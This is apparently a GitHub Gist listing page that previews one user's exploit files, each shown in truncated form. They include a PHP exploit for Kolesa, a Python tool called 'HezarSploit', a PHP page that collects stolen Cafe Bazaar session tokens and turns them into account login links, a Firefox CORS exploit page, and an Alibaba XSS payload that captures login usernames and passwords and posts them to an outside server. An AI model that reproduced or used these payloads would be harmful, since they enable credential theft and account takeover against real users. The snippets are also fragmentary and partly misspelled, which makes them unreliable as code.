Skip to content

Instantly share code, notes, and snippets.

View kolesa-exploit.php
<?php
$victim_ip_address = "";
$output="";
$phone_nums="";
// Function to send HTTP GET requests, returning [contents,location,cookies].
function http_get($URL, $cookies = "", $xhr=false)
{
global $victim_ip_address;
$xhr_header="";
if ($xhr == true) {
View HezarSploit.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import ssl
import socket
import os
import sys
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
from threading import Thread
View Bazar-Exploit.php
<?php
if (isset($_GET['key'])) {
//Get authentication token
$token = $_GET['key'];
$login_link = "https://cafebazaar.ir/login/bysession?key=" . $token . "&next=/account/";
$login_link = "Login link: <a href='" . $login_link . "' target='_blank'>" . $login_link . "</a>";
if ($token == "") {
$login_link = "Login Link: Failure! Victim not logged in.";
}
View Firefox-CORS-Misconfig.js
<html>
<meta content="text/html;charset=utf-8" http-equiv="Content-Type">
<meta content="utf-8" http-equiv="encoding">
<body onload="CreateListReaderIframe()">
<script>
function CreateListReaderIframe() {
var ifr = document.createElement("iframe");
View Alibaba-final-xss-payload.js
document.forms[0].onsubmit = function() {
var u = document.getElementById('fm-login-id');
var p = document.getElementById('fm-login-password');
var s = new XMLHttpRequets();
s.open('POST', 'https://myserver/xxx-alibaba/');
s.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
s.onreadystatechange = function() {
if (s.readState == 4) {
document.forms[0].submit();
}
View doc.open.alipay.com-vulnerable-js-searchList-v2.js
function h(b, e) {
url = d.one(".J_ajaxUrl").val();
var f = "keyword=" + (d.one(".J_Tagword") ? d.one(".J_Tagword").val() : d.one(".J_SearchKeyword").val()) + "&searchType=" + e;
url.indexOf("?") > 0 ? url += "&" : url += "?",
c({
url: url + f + "&current=" + b,
type: "post",
dataType: "json",
data: {},
success: function(b) {